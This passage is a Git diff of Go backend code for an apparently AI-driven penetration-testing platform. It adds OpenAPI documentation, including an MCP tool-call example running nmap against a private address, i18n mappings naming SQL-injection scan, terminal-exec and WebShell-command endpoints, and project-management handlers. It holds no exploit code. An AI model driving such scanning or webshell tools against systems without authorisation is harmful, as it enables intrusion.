"列出技能包文件", + "description": "获取指定技能包目录下的所有文件列表。", + "operationId": "listSkillPackageFiles", + "parameters": []map[string]interface{}{ + {"name": "name", "in": "path", "required": true, "description": "技能名称/ID", "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "files": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}, "description": "文件路径列表"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "技能不存在"}, + }, + }, + }, + "/api/skills/{name}/file": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"Skills管理"}, + "summary": "获取技能包文件内容", + "description": "读取技能包中指定文件的内容。", + "operationId": "getSkillPackageFile", + "parameters": []map[string]interface{}{ + {"name": "name", "in": "path", "required": true, "description": "技能名称/ID", "schema": map[string]interface{}{"type": "string"}}, + {"name": "path", "in": "query", "required": true, "description": "文件相对路径", "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "path": map[string]interface{}{"type": "string", "description": "文件路径"}, + "content": map[string]interface{}{"type": "string", "description": "文件内容"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + "404": map[string]interface{}{"description": "文件不存在"}, + }, + }, + "put": map[string]interface{}{ + "tags": []string{"Skills管理"}, + "summary": "写入技能包文件", + "description": "写入或更新技能包中的文件内容。", + "operationId": "putSkillPackageFile", + "parameters": []map[string]interface{}{ + {"name": "name", "in": "path", "required": true, "description": "技能名称/ID", "schema": map[string]interface{}{"type": "string"}}, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"path"}, + "properties": map[string]interface{}{ + "path": map[string]interface{}{"type": "string", "description": "文件相对路径"}, + "content": map[string]interface{}{"type": "string", "description": "文件内容"}, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "保存成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "message": map[string]interface{}{"type": "string", "example": "saved"}, + "path": map[string]interface{}{"type": "string"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + + // ==================== 监控 - 缺失端点 ==================== + "/api/monitor/executions/names": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"监控"}, + "summary": "批量获取工具名称", + "description": "根据执行ID列表批量获取对应的工具名称,消除前端N+1请求问题。", + "operationId": "batchGetToolNames", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "required": []string{"ids"}, + "properties": map[string]interface{}{ + "ids": map[string]interface{}{ + "type": "array", + "items": map[string]interface{}{"type": "string"}, + "description": "执行记录ID列表", + }, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功,返回ID到工具名称的映射", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "additionalProperties": map[string]interface{}{"type": "string"}, + "description": "键为执行ID,值为工具名称", + "example": map[string]interface{}{"exec-001": "nmap", "exec-002": "sqlmap"}, + }, + }, + }, + }, + "400": map[string]interface{}{"description": "参数错误"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + + // ==================== 知识库 - 缺失端点 ==================== + "/api/knowledge/stats": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"知识库"}, + "summary": "获取知识库统计", + "description": "获取知识库的总体统计信息,包括分类数和条目数。", + "operationId": "getKnowledgeStats", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "enabled": map[string]interface{}{"type": "boolean", "description": "知识库是否启用"}, + "total_categories": map[string]interface{}{"type": "integer", "description": "分类总数"}, + "total_items": map[string]interface{}{"type": "integer", "description": "条目总数"}, + }, + }, + }, + }, + }, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + + "/api/mcp": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"MCP"}, + "summary": "MCP端点", + "description": "MCP (Model Context Protocol) 端点,用于处理MCP协议请求。\n**协议说明**:\n本端点遵循 JSON-RPC 2.0 规范,支持以下方法:\n**1. initialize** - 初始化MCP连接\n```json\n{\n \"jsonrpc\": \"2.0\",\n \"id\": \"init-1\",\n \"method\": \"initialize\",\n \"params\": {\n \"protocolVersion\": \"2024-11-05\",\n \"capabilities\": {},\n \"clientInfo\": {\n \"name\": \"MyClient\",\n \"version\": \"1.0.0\"\n }\n }\n}\n```\n**2. tools/list** - 列出所有可用工具\n```json\n{\n \"jsonrpc\": \"2.0\",\n \"id\": \"list-1\",\n \"method\": \"tools/list\",\n \"params\": {}\n}\n```\n**3. tools/call** - 调用工具\n```json\n{\n \"jsonrpc\": \"2.0\",\n \"id\": \"call-1\",\n \"method\": \"tools/call\",\n \"params\": {\n \"name\": \"nmap\",\n \"arguments\": {\n \"target\": \"192.168.1.1\",\n \"ports\": \"80,443\"\n }\n }\n}\n```\n**4. prompts/list** - 列出所有提示词模板\n```json\n{\n \"jsonrpc\": \"2.0\",\n \"id\": \"prompts-list-1\",\n \"method\": \"prompts/list\",\n \"params\": {}\n}\n```\n**5. prompts/get** - 获取提示词模板\n```json\n{\n \"jsonrpc\": \"2.0\",\n \"id\": \"prompt-get-1\",\n \"method\": \"prompts/get\",\n \"params\": {\n \"name\": \"prompt-name\",\n \"arguments\": {}\n }\n}\n```\n**6. resources/list** - 列出所有资源\n```json\n{\n \"jsonrpc\": \"2.0\",\n \"id\": \"resources-list-1\",\n \"method\": \"resources/list\",\n \"params\": {}\n}\n```\n**7. resources/read** - 读取资源内容\n```json\n{\n \"jsonrpc\": \"2.0\",\n \"id\": \"resource-read-1\",\n \"method\": \"resources/read\",\n \"params\": {\n \"uri\": \"resource://example\"\n }\n}\n```\n**错误代码说明**:\n- `-32700`: Parse error - JSON解析错误\n- `-32600`: Invalid Request - 无效请求\n- `-32601`: Method not found - 方法不存在\n- `-32602`: Invalid params - 参数无效\n- `-32603`: Internal error - 内部错误", + "operationId": "mcpEndpoint", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/MCPMessage", + }, + "examples": map[string]interface{}{ + "listTools": map[string]interface{}{ + "summary": "列出所有工具", + "description": "获取系统中所有可用的MCP工具列表", + "value": map[string]interface{}{ + "jsonrpc": "2.0", + "id": "list-tools-1", + "method": "tools/list", + "params": map[string]interface{}{}, + }, + }, + "callTool": map[string]interface{}{ + "summary": "调用工具", + "description": "调用指定的MCP工具", + "value": map[string]interface{}{ + "jsonrpc": "2.0", + "id": "call-tool-1", + "method": "tools/call", + "params": map[string]interface{}{ + "name": "nmap", + "arguments": map[string]interface{}{ + "target": "192.168.1.1", + "ports": "80,443", + }, + }, + }, + }, + "initialize": map[string]interface{}{ + "summary": "初始化连接", + "description": "初始化MCP连接,获取服务器能力", + "value": map[string]interface{}{ + "jsonrpc": "2.0", + "id": "init-1", + "method": "initialize", + "params": map[string]interface{}{ + "protocolVersion": "2024-11-05", + "capabilities": map[string]interface{}{}, + "clientInfo": map[string]interface{}{ + "name": "MyClient", + "version": "1.0.0", + }, + }, + }, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "MCP响应(JSON-RPC 2.0格式)", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/MCPResponse", + }, + "examples": map[string]interface{}{ + "success": map[string]interface{}{ + "summary": "成功响应", + "description": "工具调用成功的响应示例", + "value": map[string]interface{}{ + "jsonrpc": "2.0", + "id": "call-tool-1", + "result": map[string]interface{}{ + "content": []map[string]interface{}{ + { + "type": "text", + "text": "工具执行结果...", + }, + }, + "isError": false, + }, + }, + }, + "error": map[string]interface{}{ + "summary": "错误响应", + "description": "工具调用失败的响应示例", + "value": map[string]interface{}{ + "jsonrpc": "2.0", + "id": "call-tool-1", + "error": map[string]interface{}{ + "code": -32601, + "message": "Tool not found", + "data": "工具 'unknown-tool' 不存在", + }, + }, + }, + }, + }, + }, + }, + "400": map[string]interface{}{ + "description": "请求格式错误(JSON解析失败)", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/MCPResponse", + }, + "example": map[string]interface{}{ + "id": nil, + "error": map[string]interface{}{ + "code": -32700, + "message": "Parse error", + "data": "unexpected end of JSON input", + }, + "jsonrpc": "2.0", + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权,需要有效的Token", + }, + "405": map[string]interface{}{ + "description": "方法不允许(仅支持POST请求)", + }, + }, + }, + }, + }, + } + + enrichSpecWithI18nKeys(spec) + c.JSON(http.StatusOK, spec) +} + +// GetConversationResults 获取对话结果(OpenAPI端点) +// 注意:创建对话和获取对话详情直接使用标准的 /api/conversations 端点 +// 这个端点只是为了提供结果聚合功能 +func (h *OpenAPIHandler) GetConversationResults(c *gin.Context) { + conversationID := c.Param("id") + + // 验证对话是否存在 + conv, err := h.db.GetConversation(conversationID) + if err != nil { + h.logger.Error("获取对话失败", zap.Error(err)) + c.JSON(http.StatusNotFound, gin.H{"error": "对话不存在"}) + return + } + + // 获取消息列表 + messages, err := h.db.GetMessages(conversationID) + if err != nil { + h.logger.Error("获取消息失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 获取漏洞列表 + vulnList, err := h.db.ListVulnerabilities(1000, 0, database.VulnerabilityListFilter{ConversationID: conversationID}) + if err != nil { + h.logger.Warn("获取漏洞列表失败", zap.Error(err)) + vulnList = []*database.Vulnerability{} + } + vulnerabilities := make([]database.Vulnerability, len(vulnList)) + for i, v := range vulnList { + vulnerabilities[i] = *v + } + + // 获取执行结果(历史大结果由 Eino reduction 落盘,此处不再聚合文件存储) + executionResults := []map[string]interface{}{} + + response := map[string]interface{}{ + "conversationId": conv.ID, + "messages": messages, + "vulnerabilities": vulnerabilities, + "executionResults": executionResults, + } + + c.JSON(http.StatusOK, response) +} diff --git a/internal/handler/openapi_i18n.go b/internal/handler/openapi_i18n.go new file mode 100644 index 00000000..953c9d2a --- /dev/null +++ b/internal/handler/openapi_i18n.go @@ -0,0 +1,174 @@ +package handler + +// apiDocI18n 为 OpenAPI 文档提供 x-i18n-* 扩展键,供前端 apiDocs 国际化使用。 +// 前端通过 apiDocs.tags.* / apiDocs.summary.* / apiDocs.response.* 翻译。 + +var apiDocI18nTagToKey = map[string]string{ + "认证": "auth", "对话管理": "conversationManagement", "对话交互": "conversationInteraction", + "批量任务": "batchTasks", "对话分组": "conversationGroups", "漏洞管理": "vulnerabilityManagement", + "角色管理": "roleManagement", "Skills管理": "skillsManagement", "监控": "monitoring", + "配置管理": "configManagement", "外部MCP管理": "externalMCPManagement", "攻击链": "attackChain", + "知识库": "knowledgeBase", "MCP": "mcp", + "FOFA信息收集": "fofaRecon", "终端": "terminal", "WebShell管理": "webshellManagement", + "对话附件": "chatUploads", "机器人集成": "robotIntegration", "多代理Markdown": "markdownAgents", +} + +var apiDocI18nSummaryToKey = map[string]string{ + "用户登录": "login", "用户登出": "logout", "修改密码": "changePassword", "验证Token": "validateToken", + "创建对话": "createConversation", "列出对话": "listConversations", "查看对话详情": "getConversationDetail", + "更新对话": "updateConversation", "删除对话": "deleteConversation", "获取对话结果": "getConversationResult", + "发送消息并获取AI回复(非流式)": "sendMessageNonStream", "发送消息并获取AI回复(流式)": "sendMessageStream", + "取消任务": "cancelTask", "列出运行中的任务": "listRunningTasks", "列出已完成的任务": "listCompletedTasks", + "创建批量任务队列": "createBatchQueue", "列出批量任务队列": "listBatchQueues", "获取批量任务队列": "getBatchQueue", + "删除批量任务队列": "deleteBatchQueue", "启动批量任务队列": "startBatchQueue", "暂停批量任务队列": "pauseBatchQueue", + "添加任务到队列": "addTaskToQueue", "SQL注入扫描": "sqlInjectionScan", "端口扫描": "portScan", + "更新批量任务": "updateBatchTask", "删除批量任务": "deleteBatchTask", + "创建分组": "createGroup", "列出分组": "listGroups", "获取分组": "getGroup", "更新分组": "updateGroup", + "删除分组": "deleteGroup", "获取分组中的对话": "getGroupConversations", "添加对话到分组": "addConversationToGroup", + "从分组移除对话": "removeConversationFromGroup", + "列出漏洞": "listVulnerabilities", "创建漏洞": "createVulnerability", "获取漏洞统计": "getVulnerabilityStats", + "获取漏洞": "getVulnerability", "更新漏洞": "updateVulnerability", "删除漏洞": "deleteVulnerability", + "列出角色": "listRoles", "创建角色": "createRole", "获取角色": "getRole", "更新角色": "updateRole", "删除角色": "deleteRole", + "获取可用Skills列表": "getAvailableSkills", "列出Skills": "listSkills", "创建Skill": "createSkill", + "获取Skill统计": "getSkillStats", "清空Skill统计": "clearSkillStats", "获取Skill": "getSkill", + "更新Skill": "updateSkill", "删除Skill": "deleteSkill", "获取绑定角色": "getBoundRoles", + "获取监控信息": "getMonitorInfo", "获取执行记录": "getExecutionRecords", "删除执行记录": "deleteExecutionRecord", + "批量删除执行记录": "batchDeleteExecutionRecords", "获取统计信息": "getStats", + "获取配置": "getConfig", "更新配置": "updateConfig", "获取工具配置": "getToolConfig", "应用配置": "applyConfig", + "列出外部MCP": "listExternalMCP", "获取外部MCP统计": "getExternalMCPStats", "获取外部MCP": "getExternalMCP", + "添加或更新外部MCP": "addOrUpdateExternalMCP", "stdio模式配置": "stdioModeConfig", "SSE模式配置": "sseModeConfig", + "删除外部MCP": "deleteExternalMCP", "启动外部MCP": "startExternalMCP", "停止外部MCP": "stopExternalMCP", + "获取攻击链": "getAttackChain", "重新生成攻击链": "regenerateAttackChain", + "设置对话置顶": "pinConversation", "设置分组置顶": "pinGroup", "设置分组中对话的置顶": "pinGroupConversation", + "获取分类": "getCategories", "列出知识项": "listKnowledgeItems", "创建知识项": "createKnowledgeItem", + "获取知识项": "getKnowledgeItem", "更新知识项": "updateKnowledgeItem", "删除知识项": "deleteKnowledgeItem", + "获取索引状态": "getIndexStatus", "重建索引": "rebuildIndex", "扫描知识库": "scanKnowledgeBase", + "搜索知识库": "searchKnowledgeBase", "基础搜索": "basicSearch", "按风险类型搜索": "searchByRiskType", + "获取检索日志": "getRetrievalLogs", "删除检索日志": "deleteRetrievalLog", + "MCP端点": "mcpEndpoint", "列出所有工具": "listAllTools", "调用工具": "invokeTool", "初始化连接": "initConnection", + "成功响应": "successResponse", "错误响应": "errorResponse", + // 新增缺失端点 + "删除对话轮次": "deleteConversationTurn", "获取消息过程详情": "getMessageProcessDetails", + "重跑批量任务队列": "rerunBatchQueue", "修改队列元数据": "updateBatchQueueMetadata", + "修改队列调度配置": "updateBatchQueueSchedule", "开关Cron自动调度": "setBatchQueueScheduleEnabled", + "获取所有分组映射": "getAllGroupMappings", + "FOFA搜索": "fofaSearch", "自然语言解析为FOFA语法": "fofaParse", + "测试OpenAI API连接": "testOpenAI", + "执行终端命令": "terminalRun", "流式执行终端命令": "terminalRunStream", "WebSocket终端": "terminalWS", + "列出WebShell连接": "listWebshellConnections", "创建WebShell连接": "createWebshellConnection", + "更新WebShell连接": "updateWebshellConnection", "删除WebShell连接": "deleteWebshellConnection", + "获取连接状态": "getWebshellConnectionState", "保存连接状态": "saveWebshellConnectionState", + "获取AI对话历史": "getWebshellAIHistory", "列出AI对话": "listWebshellAIConversations", + "执行WebShell命令": "webshellExec", "WebShell文件操作": "webshellFileOp", + "列出附件": "listChatUploads", "上传附件": "uploadChatFile", "删除附件": "deleteChatUpload", + "下载附件": "downloadChatUpload", "获取附件文本内容": "getChatUploadContent", + "写入附件文本内容": "putChatUploadContent", "创建附件目录": "mkdirChatUpload", "重命名附件": "renameChatUpload", + "企业微信回调验证": "wecomCallbackVerify", "企业微信消息回调": "wecomCallbackMessage", + "钉钉消息回调": "dingtalkCallback", "飞书消息回调": "larkCallback", "测试机器人消息处理": "testRobot", + "列出Markdown代理": "listMarkdownAgents", "创建Markdown代理": "createMarkdownAgent", + "获取Markdown代理详情": "getMarkdownAgent", "更新Markdown代理": "updateMarkdownAgent", "删除Markdown代理": "deleteMarkdownAgent", + "列出技能包文件": "listSkillPackageFiles", "获取技能包文件内容": "getSkillPackageFile", "写入技能包文件": "putSkillPackageFile", + "批量获取工具名称": "batchGetToolNames", + "获取知识库统计": "getKnowledgeStats", +} + +var apiDocI18nResponseDescToKey = map[string]string{ + "获取成功": "getSuccess", "未授权": "unauthorized", "未授权,需要有效的Token": "unauthorizedToken", + "创建成功": "createSuccess", "请求参数错误": "badRequest", "对话不存在": "conversationNotFound", + "对话不存在或结果不存在": "conversationOrResultNotFound", "请求参数错误(如task为空)": "badRequestTaskEmpty", + "请求参数错误或分组名称已存在": "badRequestGroupNameExists", "分组不存在": "groupNotFound", + "请求参数错误(如配置格式不正确、缺少必需字段等)": "badRequestConfig", + "请求参数错误(如query为空)": "badRequestQueryEmpty", "方法不允许(仅支持POST请求)": "methodNotAllowed", + "登录成功": "loginSuccess", "密码错误": "invalidPassword", "登出成功": "logoutSuccess", + "密码修改成功": "passwordChanged", "Token有效": "tokenValid", "Token无效或已过期": "tokenInvalid", + "对话创建成功": "conversationCreated", "服务器内部错误": "internalError", "更新成功": "updateSuccess", + "删除成功": "deleteSuccess", "队列不存在": "queueNotFound", "启动成功": "startSuccess", + "暂停成功": "pauseSuccess", "添加成功": "addSuccess", + "任务不存在": "taskNotFound", "对话或分组不存在": "conversationOrGroupNotFound", + "取消请求已提交": "cancelSubmitted", "未找到正在执行的任务": "noRunningTask", + "消息发送成功,返回AI回复": "messageSent", "流式响应(Server-Sent Events)": "streamResponse", + // 新增缺失端点响应 + "参数错误或删除失败": "badRequestOrDeleteFailed", + "参数错误": "paramError", "仅已完成或已取消的队列可以重跑": "onlyCompletedOrCancelledCanRerun", + "参数错误或队列正在运行中": "badRequestOrQueueRunning", "设置成功": "setSuccess", + "搜索成功": "searchSuccess", "解析成功": "parseSuccess", "测试结果": "testResult", + "执行完成": "executionDone", "SSE事件流": "sseEventStream", "WebSocket连接已建立": "wsEstablished", + "文件下载": "fileDownload", "文件不存在": "fileNotFound", "写入成功": "writeSuccess", + "重命名成功": "renameSuccess", "验证成功,返回解密后的echostr": "wecomVerifySuccess", + "处理成功": "processSuccess", "代理不存在": "agentNotFound", "保存成功": "saveSuccess", + "操作结果": "operationResult", "执行结果": "executionResult", "连接不存在": "connectionNotFound", +} + +// enrichSpecWithI18nKeys 在 spec 的每个 operation 上写入 x-i18n-tags、x-i18n-summary, +// 在每个 response 上写入 x-i18n-description,供前端按 key 做国际化。 +func enrichSpecWithI18nKeys(spec map[string]interface{}) { + paths, _ := spec["paths"].(map[string]interface{}) + if paths == nil { + return + } + for _, pathItem := range paths { + pm, _ := pathItem.(map[string]interface{}) + if pm == nil { + continue + } + for _, method := range []string{"get", "post", "put", "delete", "patch"} { + opVal, ok := pm[method] + if !ok { + continue + } + op, _ := opVal.(map[string]interface{}) + if op == nil { + continue + } + // x-i18n-tags: 与 tags 一一对应的 i18n 键数组(spec 中 tags 为 []string) + switch tags := op["tags"].(type) { + case []string: + if len(tags) > 0 { + keys := make([]string, 0, len(tags)) + for _, s := range tags { + if k := apiDocI18nTagToKey[s]; k != "" { + keys = append(keys, k) + } else { + keys = append(keys, s) + } + } + op["x-i18n-tags"] = keys + } + case []interface{}: + if len(tags) > 0 { + keys := make([]interface{}, 0, len(tags)) + for _, t := range tags { + if s, ok := t.(string); ok { + if k := apiDocI18nTagToKey[s]; k != "" { + keys = append(keys, k) + } else { + keys = append(keys, s) + } + } + } + if len(keys) > 0 { + op["x-i18n-tags"] = keys + } + } + } + // x-i18n-summary + if summary, _ := op["summary"].(string); summary != "" { + if k := apiDocI18nSummaryToKey[summary]; k != "" { + op["x-i18n-summary"] = k + } + } + // responses -> 每个 status -> x-i18n-description + if respMap, _ := op["responses"].(map[string]interface{}); respMap != nil { + for _, rv := range respMap { + if r, _ := rv.(map[string]interface{}); r != nil { + if desc, _ := r["description"].(string); desc != "" { + if k := apiDocI18nResponseDescToKey[desc]; k != "" { + r["x-i18n-description"] = k + } + } + } + } + } + } + } +} diff --git a/internal/handler/project.go b/internal/handler/project.go new file mode 100644 index 00000000..b585c57e --- /dev/null +++ b/internal/handler/project.go @@ -0,0 +1,410 @@ +package handler + +import ( + "net/http" + "strconv" + "strings" + + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/project" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +const maxProjectDescriptionRunes = 4000 + +func clampProjectDescription(s string) string { + r := []rune(s) + if len(r) <= maxProjectDescriptionRunes { + return s + } + return string(r[:maxProjectDescriptionRunes]) +} + +// ProjectHandler 项目管理处理器。 +type ProjectHandler struct { + db *database.DB + logger *zap.Logger +} + +// NewProjectHandler 创建项目管理处理器。 +func NewProjectHandler(db *database.DB, logger *zap.Logger) *ProjectHandler { + return &ProjectHandler{db: db, logger: logger} +} + +type createProjectRequest struct { + Name string `json:"name" binding:"required"` + Description string `json:"description"` + ScopeJSON string `json:"scope_json"` + Status string `json:"status"` +} + +// updateProjectRequest 部分更新:字段省略表示不修改;传 null 或 "" 可清空字符串字段。 +type updateProjectRequest struct { + Name *string `json:"name"` + Description *string `json:"description"` + ScopeJSON *string `json:"scope_json"` + Status *string `json:"status"` + Pinned *bool `json:"pinned"` +} + +// CreateProject POST /api/projects +func (h *ProjectHandler) CreateProject(c *gin.Context) { + var req createProjectRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + p := &database.Project{ + Name: strings.TrimSpace(req.Name), + Description: clampProjectDescription(req.Description), + ScopeJSON: req.ScopeJSON, + Status: strings.TrimSpace(req.Status), + } + created, err := h.db.CreateProject(p) + if err != nil { + h.logger.Error("创建项目失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, created) +} + +// GetDashboardSummary GET /api/projects/dashboard-summary +func (h *ProjectHandler) GetDashboardSummary(c *gin.Context) { + limit, _ := strconv.Atoi(strings.TrimSpace(c.DefaultQuery("fact_limit", "5"))) + if limit <= 0 { + limit = 5 + } + if limit > 50 { + limit = 50 + } + summary, err := h.db.GetProjectDashboardSummary(limit) + if err != nil { + h.logger.Error("获取项目仪表盘摘要失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if summary.RecentFacts == nil { + summary.RecentFacts = []database.ProjectDashboardFact{} + } + c.JSON(http.StatusOK, summary) +} + +// ListProjects GET /api/projects +func (h *ProjectHandler) ListProjects(c *gin.Context) { + status := c.Query("status") + search := c.Query("search") + limit, _ := strconv.Atoi(c.DefaultQuery("limit", "50")) + offset, _ := strconv.Atoi(c.Query("offset")) + if limit <= 0 { + limit = 50 + } + if limit > 500 { + limit = 500 + } + list, err := h.db.ListProjects(status, search, limit, offset) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if list == nil { + list = []*database.Project{} + } + total, err := h.db.CountProjects(status, search) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{ + "projects": list, + "total": total, + "limit": limit, + "offset": offset, + }) +} + +// GetProjectStats GET /api/projects/:id/stats +func (h *ProjectHandler) GetProjectStats(c *gin.Context) { + stats, err := project.GetProjectStats(h.db, c.Param("id")) + if err != nil { + if strings.Contains(err.Error(), "不存在") { + c.JSON(http.StatusNotFound, gin.H{"error": "项目不存在"}) + return + } + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, stats) +} + +// ListProjectConversations GET /api/projects/:id/conversations +func (h *ProjectHandler) ListProjectConversations(c *gin.Context) { + projectID := c.Param("id") + if _, err := h.db.GetProject(projectID); err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": "项目不存在"}) + return + } + limit, _ := strconv.Atoi(c.DefaultQuery("limit", "100")) + offset, _ := strconv.Atoi(c.Query("offset")) + list, err := h.db.ListConversationsByProjectID(projectID, limit, offset) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if list == nil { + list = []*database.Conversation{} + } + total, _ := h.db.CountConversationsByProjectID(projectID) + c.JSON(http.StatusOK, gin.H{ + "conversations": list, + "total": total, + "limit": limit, + "offset": offset, + }) +} + +// GetProject GET /api/projects/:id +func (h *ProjectHandler) GetProject(c *gin.Context) { + p, err := h.db.GetProject(c.Param("id")) + if err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": "项目不存在"}) + return + } + c.JSON(http.StatusOK, p) +} + +// UpdateProject PUT /api/projects/:id +func (h *ProjectHandler) UpdateProject(c *gin.Context) { + id := c.Param("id") + p, err := h.db.GetProject(id) + if err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": "项目不存在"}) + return + } + var req updateProjectRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if req.Name != nil { + if s := strings.TrimSpace(*req.Name); s != "" { + p.Name = s + } + } + if req.Description != nil { + p.Description = clampProjectDescription(*req.Description) + } + if req.ScopeJSON != nil { + p.ScopeJSON = *req.ScopeJSON + } + if req.Status != nil { + if s := strings.TrimSpace(*req.Status); s != "" { + p.Status = s + } + } + if req.Pinned != nil { + p.Pinned = *req.Pinned + } + if err := h.db.UpdateProject(p); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, p) +} + +// DeleteProject DELETE /api/projects/:id +func (h *ProjectHandler) DeleteProject(c *gin.Context) { + if err := h.db.DeleteProject(c.Param("id")); err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"success": true}) +} + +type upsertFactRequest struct { + FactKey string `json:"fact_key" binding:"required"` + Category string `json:"category"` + Summary string `json:"summary" binding:"required"` + Body string `json:"body"` + Confidence string `json:"confidence"` + Pinned bool `json:"pinned"` + RelatedVulnerabilityID string `json:"related_vulnerability_id"` +} + +// updateFactRequest 部分更新事实;指针字段省略=不修改,body 传 "" 可清空(仍走 merge 逻辑见 Upsert)。 +type updateFactRequest struct { + FactKey *string `json:"fact_key"` + Category *string `json:"category"` + Summary *string `json:"summary"` + Body *string `json:"body"` + Confidence *string `json:"confidence"` + Pinned *bool `json:"pinned"` + RelatedVulnerabilityID *string `json:"related_vulnerability_id"` + ClearBody bool `json:"clear_body"` +} + +// ListFacts GET /api/projects/:id/facts (fact_key 查询参数可获取单条详情) +func (h *ProjectHandler) ListFacts(c *gin.Context) { + projectID := c.Param("id") + if key := strings.TrimSpace(c.Query("fact_key")); key != "" { + f, err := h.db.GetProjectFactByKey(projectID, key) + if err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, f) + return + } + limit, _ := strconv.Atoi(c.DefaultQuery("limit", "100")) + offset, _ := strconv.Atoi(c.Query("offset")) + filter := database.ProjectFactListFilter{ + Category: c.Query("category"), + Confidence: c.Query("confidence"), + Search: c.Query("search"), + RelatedVulnerabilityID: c.Query("related_vulnerability_id"), + } + if c.Query("exclude_deprecated") == "1" || c.Query("exclude_deprecated") == "true" { + filter.ExcludeDeprecated = true + } + list, err := h.db.ListProjectFacts(projectID, filter, limit, offset) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if list == nil { + list = []*database.ProjectFact{} + } + if sparseOnly := c.Query("sparse_only"); sparseOnly == "1" || sparseOnly == "true" { + filtered := make([]*database.ProjectFact, 0, len(list)) + for _, f := range list { + if project.IsSparseFactBody(f.Category, f.FactKey, f.Body) { + filtered = append(filtered, f) + } + } + list = filtered + } + c.JSON(http.StatusOK, list) +} + +// CreateFact POST /api/projects/:id/facts +func (h *ProjectHandler) CreateFact(c *gin.Context) { + var req upsertFactRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + f := &database.ProjectFact{ + ProjectID: c.Param("id"), + FactKey: req.FactKey, + Category: req.Category, + Summary: req.Summary, + Body: req.Body, + Confidence: req.Confidence, + Pinned: req.Pinned, + RelatedVulnerabilityID: req.RelatedVulnerabilityID, + } + created, err := h.db.UpsertProjectFact(f) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, created) +} + +// UpdateFact PUT /api/projects/:id/facts/:factId +func (h *ProjectHandler) UpdateFact(c *gin.Context) { + existing, err := h.db.GetProjectFact(c.Param("factId")) + if err != nil || existing.ProjectID != c.Param("id") { + c.JSON(http.StatusNotFound, gin.H{"error": "事实不存在"}) + return + } + var req updateFactRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if req.FactKey 